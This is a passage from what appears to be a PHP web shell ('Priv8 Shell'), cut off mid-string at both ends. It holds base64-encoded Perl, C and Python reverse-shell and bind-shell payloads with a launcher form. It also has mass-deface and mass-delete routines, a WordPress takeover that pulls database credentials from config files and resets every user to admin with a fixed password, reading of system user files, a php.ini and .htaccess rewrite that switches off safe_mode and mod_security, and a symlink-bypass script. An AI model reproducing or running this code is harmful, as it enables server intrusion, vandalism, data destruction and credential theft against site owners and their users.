XNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7\";\r\n\t\$bind_port_c=\"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9\";\r\n\t\$pyy=\"IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBDb243ZXh0IC0gWGFpIFN5bmRpY2F0ZVxuVGhhbmtzIEdvb2dsZSBGb3IgUmVmZXJlbnNpXG5cbicnJykNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwwKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDEpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMikNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwzKQ0KICAgIHNoZWxsID0gc3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pDQogIGV4Y2VwdCBzb2NrZXQudGltZW91dDoNCiAgICBwcmludCAiVGltT3V0Ig0KICBleGNlcHQgc29ja2V0LmVycm9yLCBlOg0KICAgIHByaW50ICJFcnJvciIsIGUNCnB5YmFja2Nvbm5lY3QoKQ==\";\r\n\t\$bind_port_p=\"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=\";\r\n\techo \"<center><h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'><br>\r\n\t<span>Bind port to /bin/sh</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpp'>Perl</option><option value='bpc'>C</option></select></label> <input type=submit value='submit'>\r\n\t</form><br>\r\n\t<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\r\n\t<span>Back-connect to</span><br/>\r\n\tServer: <input type='text' name='server' value=\". \$_SERVER['REMOTE_ADDR'] .\"> Port: <input type='text' name='port' value='21'> Using: <label><select name='using'><option value='bcpy'>Python</option><option value='bcp'>Perl</option><option value='bcc'>C</option></select></label> <input type=submit value='submit'><br><br><br>\r\n\t</form><br>\"; \r\n\tif(isset(\$_POST['p1'])) {\r\n\t\tfunction cf(\$f,\$t) {\r\n\t\t\t\$w=@fopen(\$f,\"w\") or @function_exists('file_put_contents');\r\n\t\t\tif(\$w)\t{\r\n\t\t\t\t@fwrite(\$w,@base64_decode(\$t)) or @fputs(\$w,@base64_decode(\$t)) or @file_put_contents(\$f,@base64_decode(\$t));\r\n\t\t\t\t@fclose(\$w);\r\n\t\t\t}\r\n\t\t}\r\n\t\tif(\$_POST['p1'] == 'bpc') {\r\n\t\t\tcf(\"/tmp/bp.c\",\$bind_port_c);\r\n\t\t\t\$\xe2\x96\x96 = ex(\"gcc -o /tmp/bp /tmp/bp.c\");\r\n\t\t\t@unlink(\"/tmp/bp.c\");\r\n\t\t\t\$\xe2\x96\x96 .= ex(\"/tmp/bp \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n\t\t\techo \"<pre class=ml1>\$\xe2\x96\x96\".ex(\"ps aux | grep bp\").\"</pre>\";\r\n\t\t}\r\n\t\tif(\$_POST['p1'] == 'bpp') {\r\n\t\t\tcf(\"/tmp/bp.pl\",\$bind_port_p);\r\n\t\t\t\$\xe2\x96\x96 = ex(which(\"perl\").\" /tmp/bp.pl \".\$_POST['p2'].\" &\");\r\n\t\t\techo \"<pre class=ml1>\$\xe2\x96\x96\".ex(\"ps aux | grep bp.pl\").\"</pre>\";\r\n\t\t}\r\n\t\tif(\$_POST['p1'] == 'bcc') {\r\n\t\t\tcf(\"/tmp/bc.c\",\$back_connect_c);\r\n\t\t\t\$\xe2\x96\x96 = ex(\"gcc -o /tmp/bc /tmp/bc.c\");\r\n\t\t\t@unlink(\"/tmp/bc.c\");\r\n\t\t\t\$\xe2\x96\x96 .= ex(\"/tmp/bc \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n\t\t\techo \"<pre class=ml1>\$\xe2\x96\x96\".ex(\"ps aux | grep bc\").\"</pre>\";\r\n\t\t}\r\n\t\tif(\$_POST['p1'] == 'bcp') {\r\n\t\t\tcf(\"/tmp/bc.pl\",\$back_connect_p);\r\n\t\t\t\$\xe2\x96\x96 = ex(which(\"perl\").\" /tmp/bc.pl \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n\t\t\techo \"<pre class=ml1>\$\xe2\x96\x96\".ex(\"ps aux | grep bc.pl\").\"</pre>\";\r\n\t\t}\r\n\t\tif(\$_POST['p1'] == 'bcpy') {\r\n\t\t\tcf(\"/tmp/bc.py\",\$back_connect_p);\r\n\t\t\t\$\xe2\x96\x96 = ex(which(\"perl\").\" /tmp/bc.py \".\$_POST['p2'].\" \".\$_POST['p3'].\" &\");\r\n\t\t\techo \"<pre class=ml1>\$\xe2\x96\x96\".ex(\"ps aux | grep bc.py\").\"</pre>\";\r\n }\r\n\t}\r\n\techo '</div>';\r\n\thardFooter();\r\n}\r\n\r\n// Back Connect Section END \r\n\r\n\r\nif (isset(\$_REQUEST['mas'])) {\r\n \r\n@ini_set('error_log', NULL);\r\n@ini_set('log_errors', 0);\r\n@ini_set('max_execution_time', 0);\r\n@ini_set('output_buffering', 0);\r\n@ini_set('display_errors', 0);\r\necho \"<center><form action=\\\"\\\" method=\\\"post\\\"> \";\r\nfunction edit_file(\$file, \$index) {\r\n if (is_writable(\$file)) {\r\n clear_fill(\$file, \$index);\r\n echo \"<Span style='color:green;'><strong> [+] Done 100% Successfull </strong></span><br></center>\";\r\n } else {\r\n echo \"<Span style='color:red;'><strong> [-] Failed :( </strong></span><br></center>\";\r\n }\r\n}\r\nfunction hapus_Massal(\$dir, \$namafile) {\r\n if (is_writable(\$dir)) {\r\n \$dira = scandir(\$dir);\r\n foreach (\$dira as \$dirb) {\r\n \$dirc = \"\$dir/\$dirb\";\r\n \$lokasi = \$dirc . '/' . \$namafile;\r\n if (\$dirb === '.') {\r\n if (file_exists(\"\$dir/\$namafile\")) {\r\n unlink(\"\$dir/\$namafile\");\r\n }\r\n } elseif (\$dirb === '..') {\r\n if (file_exists(\"\" . dirname(\$dir) . \"/\$namafile\")) {\r\n unlink(\"\" . dirname(\$dir) . \"/\$namafile\");\r\n }\r\n } else {\r\n if (is_dir(\$dirc)) {\r\n if (is_writable(\$dirc)) {\r\n if (file_exists(\$lokasi)) {\r\n echo \"[<font color=red>DELETED</font>] \$lokasi<br>\";\r\n unlink(\$lokasi);\r\n \$idx = hapus_Massal(\$dirc, \$namafile);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\nfunction clear_fill(\$file, \$index) {\r\n if (file_exists(\$file)) {\r\n \$handle = fopen(\$file, 'w');\r\n fwrite(\$handle, '');\r\n fwrite(\$handle, \$index);\r\n fclose(\$handle);\r\n }\r\n}\r\nfunction gass() {\r\n global \$dirr, \$index;\r\n chdir(\$dirr);\r\n \$me = str_replace(dirname(__FILE__) . '/', '', __FILE__);\r\n \$files = scandir(\$dirr);\r\n \$notallow = array(\".htaccess\", \"www\", \"Web.Config\", \"UMD.php\", \"Web.config\", \"web.config\", \"web.Config\", \"..\", \".\");\r\n sort(\$files);\r\n \$n = 0;\r\n foreach (\$files as \$file) {\r\n if (\$file != \$me && is_dir(\$file) != 1 && !in_array(\$file, \$notallow)) {\r\n echo \"<center><Span style='color: #8A8A8A;'><strong>\$dirr/</span>\$file</strong> ====> \";\r\n edit_file(\$file, \$index);\r\n flush();\r\n \$n = \$n + 1;\r\n }\r\n }\r\n echo \"<br>\";\r\n echo \"<center><br><h3>\$n Files Defaced </h3></center><br> \";\r\n}\r\nfunction ListFiles(\$dirrall) {\r\n if (\$dh = opendir(\$dirrall)) {\r\n \$files = Array();\r\n \$inner_files = Array();\r\n \$me = str_replace(dirname(__FILE__) . '/', '', __FILE__);\r\n \$notallow = array(\$me, \".htaccess\", \"www\", \"Web.Config\", \"UMD.php\", \"Web.config\", \"web.config\", \"web.Config\");\r\n while (\$file = readdir(\$dh)) {\r\n if (\$file != \".\" && \$file != \"..\" && \$file[0] != '.' && !in_array(\$file, \$notallow)) {\r\n if (is_dir(\$dirrall . \"/\" . \$file)) {\r\n \$inner_files = ListFiles(\$dirrall . \"/\" . \$file);\r\n if (is_array(\$inner_files)) \$files = array_merge(\$files, \$inner_files);\r\n } else {\r\n array_push(\$files, \$dirrall . \"/\" . \$file);\r\n }\r\n }\r\n }\r\n closedir(\$dh);\r\n return \$files;\r\n }\r\n}\r\nfunction gass_all() {\r\n global \$index;\r\n \$dirrall = \$_POST['d_dir'];\r\n foreach (ListFiles(\$dirrall) as \$key => \$file) {\r\n \$file = str_replace('//', \"/\", \$file);\r\n echo \"<center><strong>\$file</strong> ===>\";\r\n edit_file(\$file, \$index);\r\n flush();\r\n }\r\n \$key = \$key + 1;\r\n echo \"<center><br><h3>\$key Files Defaced </h3></center><br>\";\r\n}\r\nfunction sabun_Massal(\$dir, \$namafile, \$isi_script) {\r\n if (is_writable(\$dir)) {\r\n \$dira = scandir(\$dir);\r\n foreach (\$dira as \$dirb) {\r\n \$dirc = \"\$dir/\$dirb\";\r\n \$lokasi = \$dirc . '/' . \$namafile;\r\n if (\$dirb === '.') {\r\n file_put_contents(\$lokasi, \$isi_script);\r\n } elseif (\$dirb === '..') {\r\n file_put_contents(\$lokasi, \$isi_script);\r\n } else {\r\n if (is_dir(\$dirc)) {\r\n if (is_writable(\$dirc)) {\r\n echo \"<font color=red>[ DONE ] </font><font color=white> \$lokasi</font><br>\";\r\n file_put_contents(\$lokasi, \$isi_script);\r\n \$idx = sabun_Massal(\$dirc, \$namafile, \$isi_script);\r\n }\r\n }\r\n }\r\n }\r\n }\r\n}\r\nif (\$_POST['Mass'] == 'onedir') {\r\n echo \"<br> Versi Text Area<br><textarea style='background:black;outline:none;color:red;' name='index' rows='10' cols='67'>\r\n\";\r\n \$ini = \"http://\";\r\n \$mainpath = \$_POST[d_dir];\r\n \$file = \$_POST[d_file];\r\n \$dir = opendir(\"\$mainpath\");\r\n \$code = base64_encode(\$_POST[script]);\r\n \$indx = base64_decode(\$code);\r\n while (\$row = readdir(\$dir)) {\r\n \$start = @fopen(\"\$row/\$file\", \"w+\");\r\n \$finish = @fwrite(\$start, \$indx);\r\n if (\$finish) {\r\n echo \"\$ini\$row/\$file\r\n\";\r\n }\r\n }\r\n echo \"</textarea><br><br><br><b>Versi Text</b><br><br><br>\r\n\";\r\n \$mainpath = \$_POST[d_dir];\r\n \$file = \$_POST[d_file];\r\n \$dir = opendir(\"\$mainpath\");\r\n \$code = base64_encode(\$_POST[script]);\r\n \$indx = base64_decode(\$code);\r\n while (\$row = readdir(\$dir)) {\r\n \$start = @fopen(\"\$row/\$file\", \"w+\");\r\n \$finish = @fwrite(\$start, \$indx);\r\n if (\$finish) {\r\n echo '<a href=\"http://' . \$row . '/' . \$file . '\" target=\"_blank\">http://' . \$row . '/' . \$file . '</a><br>';\r\n }\r\n }\r\n} elseif (\$_POST['Mass'] == 'sabunkabeh') {\r\n gass();\r\n} elseif (\$_POST['Mass'] == 'hapusMassal') {\r\n hapus_Massal(\$_POST['d_dir'], \$_POST['d_file']);\r\n} elseif (\$_POST['Mass'] == 'sabunmematikan') {\r\n gass_all();\r\n} elseif (\$_POST['Mass'] == 'Massdeface') {\r\n echo \"<div style='margin: 5px auto; padding: 5px'>\";\r\n sabun_Massal(\$_POST['d_dir'], \$_POST['d_file'], \$_POST['script']);\r\n echo \"</div>\";\r\n} else {\r\n echo \"<center>\t\t<font face='Open Sans' color='red' size='3' >Select Type:<br></font><select class=\\\"select\\\" name=\\\"Mass\\\" style=\\\"width: 450px; background-color:#000000; color:#ffffff\\\" height=\\\"10\\\" ><option value=\\\"onedir\\\">Mass Deface 1 Dir</option>\t<option value=\\\"Massdeface\\\">Mass Deface ALL Dir</option><option value=\\\"sabunkabeh\\\">Current Dir All Files</option>\t<option value=\\\"sabunmematikan\\\">Replace Everything With Deface</option><option value=\\\"hapusMassal\\\">Mass Delete Files</option></center></select><br><font face='Open Sans' color='red' size='3' >Folder:</font><br>\t<input name='d_dir' value='\" . getcwd() . \"' required='' type='text' style='width: 450px; background-color:#000000; color:#ffffff' height='10'><br><font face='Open Sans' color='red' size='3' >Filename:</font><br><input type='text' name='d_file' value='index.html' style='width: 450px; background-color:#000000; color:#ffffff' height='10'><br><font face='Open Sans' color='red' size='3' >Index File:</font><br>\r\n\t\r\n\t<textarea name='script' style='width: 450px; height: 200px; background-color:#000000; color:#ffffff '> </textarea><br>\r\n\t\r\n\t<input type='submit' name='start' value='Mass Deface' style='width: 200px;'></form></center></div>\";\r\n}\r\n die;\r\n}\r\n\r\nif (isset(\$_REQUEST['user'])) {\r\necho\"<html><head><title>Priv8 Shell Wp Mass User Changer</title></head>\r\n<style>\r\n@import 'https://fonts.googleapis.com/css?family=Open+Sans';\r\n\r\nh1{\r\n\tcolor:#16a085;\r\n\ttext-shadow:0 0 5px;\r\n\tfont-family: Open Sans;\r\n}\r\n#gter{\r\n\tposition: absolute;\r\n\ttop: 0;\r\n\twidth: 100%;\r\n\ttext-align: center;\r\n\tbackground: black;\r\n\tcolor:#fff;\r\n\tpadding-top: 10px;\r\n\tpadding-bottom: 10px;\r\n\tfont-family: Open Sans;\r\n\tmargin-bottom:20px;\r\n}\r\n#gter span{\r\n\tcolor:white;\r\n\tfont-size: 18px;\r\n\ttext-shadow: :0px 0px 15px #00ffff;\r\n}\r\n.f{\r\n\tcolor:white;\r\n\tfont-family: Open Sans;\r\n\ttext-shadow: 0 0 15px #00ffff;\r\n\tfont-size: 21px;\r\n}\r\na{\r\n\tfont-family: Open Sans;\r\n\ttext-decoration: none;\r\n\tcolor:white;\r\n\ttext-shadow:0 0 15px #ff1111;\r\n}\r\nform{\r\n\tmargin-top: 10px;\r\n}\r\ninput[type=submit]{\r\n\tfont-size:13px;\r\n\theight: 25px;\r\n\twidth: 150px;\r\n\tborder: 2px solid red;\r\n\tcolor: white;\r\n\tbackground-color: black;\r\n\tfont-family: Open Sans;\r\n}\r\ninput[type=submit]:hover{\r\n\tbox-shadow: 0 0 2px #ff1111;\r\n}\r\ninput[type=text]{\r\n\tfont-family:Open Sans;\r\n\twidth: 400px;\r\n\theight: 25px;\r\n\tcolor: red;\r\n\tbackground: #000000;\r\n\tborder: 1px solid #ff1111;\r\n\tpadding: 5px;\r\n\ttext-align: center;\r\n\tfont-size:15px;\r\n}\t\r\ninput[type=text]:focus{\r\n\tbox-shadow: 0 0 3px #ff1111;\r\n}\r\n.heading{\r\n\tcolor:white;\r\n\tfont-size:25px;\r\n\tmargin-top: 20px;\r\n\tmargin-bottom: -110px;\r\n\tfont-family:Open Sans;\r\n\ttext-shadow:0px 0px 20px red;\t\r\n}\r\n</style>\r\n</head>\r\n<center>\r\n\r\n<form method='post'>\r\n<input type='text' name='config' placeholder='Config URL Here'>\r\n<br><br>\r\n<input type='submit' name='ch' value='Change Admin'>\r\n</form>\r\n</center>\";\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\nif (\$_POST['ch']) {\r\n \$get2 = file_get_contents(\$_POST['config']);\r\n preg_match_all('#<a href=\"(.*?)\"#', \$get2, \$config);\r\n foreach (\$config[1] as \$don) {\r\n \$get = file_get_contents(\$_POST['config'] . \"/\" . \$don);\r\n preg_match_all(\"#'DB_HOST', '(.*?)'#\", \$get, \$host);\r\n foreach (\$host[1] as \$don) {\r\n \$host = \$don;\r\n }\r\n preg_match_all(\"#'DB_PASSWORD', '(.*?)'#\", \$get, \$pass);\r\n foreach (\$pass[1] as \$done) {\r\n \$password = \$done;\r\n }\r\n preg_match_all(\"#'DB_USER', '(.*?)'#\", \$get, \$user);\r\n foreach (\$user[1] as \$done1) {\r\n \$user = \$done1;\r\n }\r\n preg_match_all(\"#'DB_NAME', '(.*?)'#\", \$get, \$name);\r\n foreach (\$name[1] as \$done2) {\r\n \$name = \$done2;\r\n }\r\n preg_match_all(\"#\$table_prefix = '(.*?)'#\", \$get, \$prefix);\r\n foreach (\$prefix[1] as \$done3) {\r\n \$prefix = \$done3;\r\n }\r\n \$connect = mysqli_connect(\$host, \$user, \$password, \$name);\r\n if (\$connect) {\r\n \$query1 = mysqli_query(\$connect, \"select * from \" . \$prefix . \"options where option_name='siteurl'\");\r\n while (\$siteurl = mysqli_fetch_array(\$query1)) {\r\n \$site_url = \$siteurl['option_value'];\r\n }\r\n \$query2 = mysqli_query(\$connect, \"update \" . \$prefix . \"users set user_login='admin',user_pass='a09ac1f98189b89fd578b4fca7bf8bb2'\");\r\n if (\$query2) {\r\n echo \"<center><span class=f>URL : <a href='\$site_url/wp-login.php' target='_blank'>\$site_url/wp-login.php</a><br><br>UserName : admin<br><br>Password : Priv8shell<br><br></span></center>\";\r\n }\r\n }\r\n }\r\n}\r\n echo\"</body></html>\";\r\n\t\r\n die;\r\n}\r\n\r\nif (isset(\$_REQUEST['reseller'])) {\r\necho\"<html> <body style='text-align: center'> <center> <table border='1' width='50%' cellspacing='0' cellpadding='15' style='border-width: 0px'> \t\t<tr> \t\t\t<td background='http://buyshellsites.com/bg.gif' style='border-style: none; border-width: medium'> <div align='center'> <table border='1' width='100%' bgcolor='#000000' cellpadding='0' style='border-collapse: collapse' bordercolor='#333333'> \t<tr> \t\t \t\t<td width='100' align='center'> \t\t<font face='Courier New' size='2' color='#ff1111'>Reseller</font></td> \t\t<td width='100' align='center'> \t\t<font face='Courier New' size='2' color='#ff1111'>Accounts</font></td> \t\t<td width='100' align='center'> \t\t<font face='Courier New' size='2' color='#ff1111'>Symlink</font></td> \t\t \t</tr> </table> <BR>\";\r\n\r\n\r\n\r\n## grabs resellerss file\r\n\$lines = file(\"/etc/trueuserowners\");\r\n\r\n\r\n## split pure resellers's names\r\nfor (\$i = 0; \$i < count(\$lines); \$i++) {\r\n\$values2 = split(': ', \$lines[\$i]);\r\n\$resellers[\$i] = \$values2['1'];\r\n}\r\n\r\n## remove duplicated resellerss and empty values\r\n\$resellers = array_unique(\$resellers);\r\n\$resellers = array_filter(\$resellers);\r\n\r\nforeach(\$resellers as \$reseller){\r\n\t\$count = 0;\r\nfor (\$i = 0; \$i < count(\$lines); \$i++) {\r\n\t\r\n\tif (strpos(\$lines[\$i], \": \$reseller\") ) {\r\n \$count = \$count+1;\r\n}\r\n\t\r\n}\r\n\r\nprint '<table border=\"1\" width=\"100%\" bgcolor=\"#333333\" cellpadding=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#000000\">\r\n\t<tr>\r\n\t\t\r\n\t\t<td width=\"100\" align=\"center\">\r\n\t\t<font face=\"Courier New\" size=\"2\" color=\"#ff1111\">'.\$reseller.'</font></td>\r\n\t\t<td width=\"100\" align=\"center\">\r\n\t\t<font face=\"Courier New\" size=\"2\" color=\"#ff1111\">'.\$count.'</font></td>\r\n\t\t<td width=\"100\" align=\"center\">\r\n\t\t<a href=\"./sym1/root/home/'.\$reseller.'/public_html/\" target=\"_blank\"><font face=\"Courier New\" size=\"2\" color=\"#ff1111\">Symlink</font></td>\r\n\r\n\t</tr>\r\n</table>\r\n\r\n\r\n\r\n<BR></center> </body> </html>';\r\n}\r\n\r\n\r\n die;\r\n}\r\n\r\nif (isset(\$_REQUEST['passwd'])) {\r\n@ini_set('error_log', NULL);\r\n@ini_set('log_errors', 0);\r\n@ini_set('max_execution_time', 0);\r\n@ini_set('output_buffering', 0);\r\n@ini_set('display_errors', 0);\r\n echo '<center>';\r\n echo \"<textarea class='inputz' cols='90' rows='20'>\";\r\n for (\$uid = 0;\$uid < 60000;\$uid++) {\r\n \$ara = posix_getpwuid(\$uid);\r\n if (!empty(\$ara)) {\r\n while (list(\$key, \$val) = each(\$ara)) {\r\n print \"\$val:\";\r\n }\r\n print \"\r\n\";\r\n }\r\n }\r\n echo \"</textarea><br><br>\";\r\n \r\n die;\r\n}\r\nif (isset(\$_REQUEST['disabled'])) {\r\necho \"<html>\r\n\r\n<head>\r\n<meta http-equiv='pragma' content='no-cache'>\r\n</head><body>\";\r\n\r\n\$fp = fopen(\"php.ini\",\"w+\");\r\nfwrite(\$fp,\"safe_mode = Off\r\ndisable_functions = NONE\r\nopen_basedir = OFF \");\r\necho \"<center><b><font color='white' size='4'>[SafeMode Done]</font></center>\";\r\necho (\"\");\r\n\r\n\$fp2 = fopen(\".htaccess\",\"w+\");\r\nfwrite(\$fp2,\"\r\n<IfModule mod_security.c>\r\nKillFilterEngine Off\r\nKillFilterScanPOST Off\r\nKillFilterCheckURLEncoding Off\r\nKillFilterCheckUnicodeEncoding Off\r\n</IfModule>\r\n\");\r\n\r\n\r\necho \"<center><b> <font color='white' size='4'>[Mod_Security Done]</font></center>\";\r\n die;\r\n}\r\nif (isset(\$_REQUEST['sym'])) {\r\nerror_reporting(0);\r\n\$sym_dir = mkdir('priv_sympy', 0755);\r\nchdir('priv_sympy');\r\n\$file_sym = \"sym.py\";\r\n\$sym_script = \"Iy8qUHl0aG9uCgppbXBvcnQgdGltZQppbXBvcnQgb3MKaW1wb3J0IHN5cwppbXBvcnQgcmUKCm9zLnN5c3RlbSgiY29sb3IgQyIpCgpodGEgPSAiXG5GaWxlIDogLmh0YWNjZXNzIC8vIENyZWF0ZWQgU3VjY2Vzc2Z1bGx5IVxuIgpmID0gIkFsbCBQcm9jZXNzZXMgRG9uZSFcblN5bWxpbmsgQnlwYXNzZWQgU3VjY2Vzc2Z1bGx5IVxuIgpwcmludCAiXG4iCgpvcy5tYWtlZGlycygnc3ltJykKb3MuY2hkaXIoJ3N5bScpCgpzdXNyPVtdCnNpdGV4PVtdCm9zLnN5c3RlbSgibG4gLXMgLyBwcml2OC50eHQiKQoKaCA9ICJPcHRpb25zIEluZGV4ZXMgRm9sbG93U3ltTGlua3NcbkRpcmVjdG9yeUluZGV4IHByaXY4LnBodG1sXG5BZGRUeXBlIHR4dCAucGhwXG5BZGRIYW5kbGVyIHR4dCAucGhwIgptID0gb3BlbigiLmh0YWNjZXNzIiwidysiKQptLndyaXRlKGgpCm0uY2xvc2UoKQpwcmludCBodGEKCnNmID0gIjxodG1sPjx0aXRsZT5TeW1saW5rIFB5dGhvbjwvdGl0bGU+PGNlbnRlcj48Zm9udCBjb2xvcj13aGl0ZSBzaXplPTU+UHJpdjggU215bGluazxicj48L2ZvbnQ+PGJyPjxmb250IGNvbG9yPXdoaXRlIHNpemU9Mz48dGFibGU+IgoKbyA9IG9wZW4oJy9ldGMvcGFzc3dkJywncicpCm89by5yZWFkKCkKbyA9IHJlLmZpbmRhbGwoJy9ob21lL1x3KycsbykKCmZvciB4dXNyIGluIG86Cgl4dXNyPXh1c3IucmVwbGFjZSgnL2hvbWUvJywnJykKCXN1c3IuYXBwZW5kKHh1c3IpCnByaW50ICItIiozMAp4c2l0ZSA9IG9zLmxpc3RkaXIoIi92YXIvbmFtZWQiKQoKZm9yIHh4c2l0ZSBpbiB4c2l0ZToKCXh4c2l0ZT14eHNpdGUucmVwbGFjZSgiLmRiIiwiIikKCXNpdGV4LmFwcGVuZCh4eHNpdGUpCnByaW50IGYKcGF0aD1vcy5nZXRjd2QoKQppZiAiL3B1YmxpY19odG1sLyIgaW4gcGF0aDoKCXBhdGg9Ii9wdWJsaWNfaHRtbC8iCmVsc2U6CglwYXRoID0gIi9odG1sLyIKY291bnRlcj0xCmlwcz1vcGVuKCJwcml2OC5waHRtbCIsInciKQppcHMud3JpdGUoc2YpCgpmb3IgZnVzciBpbiBzdXNyOgoJZm9yIGZzaXRlIGluIHNpdGV4OgoJCWZ1PWZ1c3JbMDo1XQoJCXM9ZnNpdGVbMDo1XQoJCWlmIGZ1PT1zOgoJCQlpcHMud3JpdGUoIjxib2R5IGJnY29sb3I9YmxhY2s+PHRyPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7Y29sb3I6d2hpdGU7PiVzPC90ZD48dGQgc3R5bGU9Zm9udC1mYW1pbHk6Y2FsaWJyaTtmb250LXdlaWdodDpib2xkO2NvbG9yOnJlZDs+JXM8L3RkPjx0ZCBzdHlsZT1mb250LWZhbWlseTpjYWxpYnJpO2ZvbnQtd2VpZ2h0OmJvbGQ7PjxhIGhyZWY9cHJpdjgudHh0L2hvbWUvJXMlcyB0YXJnZXQ9X2JsYW5rID4lczwvYT48L3RkPiIlKGNvdW50ZXIsZnVzcixmdXNyLHBhdGgsZnNpdGUpKQoJCQljb3VudGVyPWNvdW50ZXIrMQ==\";\r\n\$sym = fopen(\$file_sym, \"w\");\r\nfwrite(\$sym, 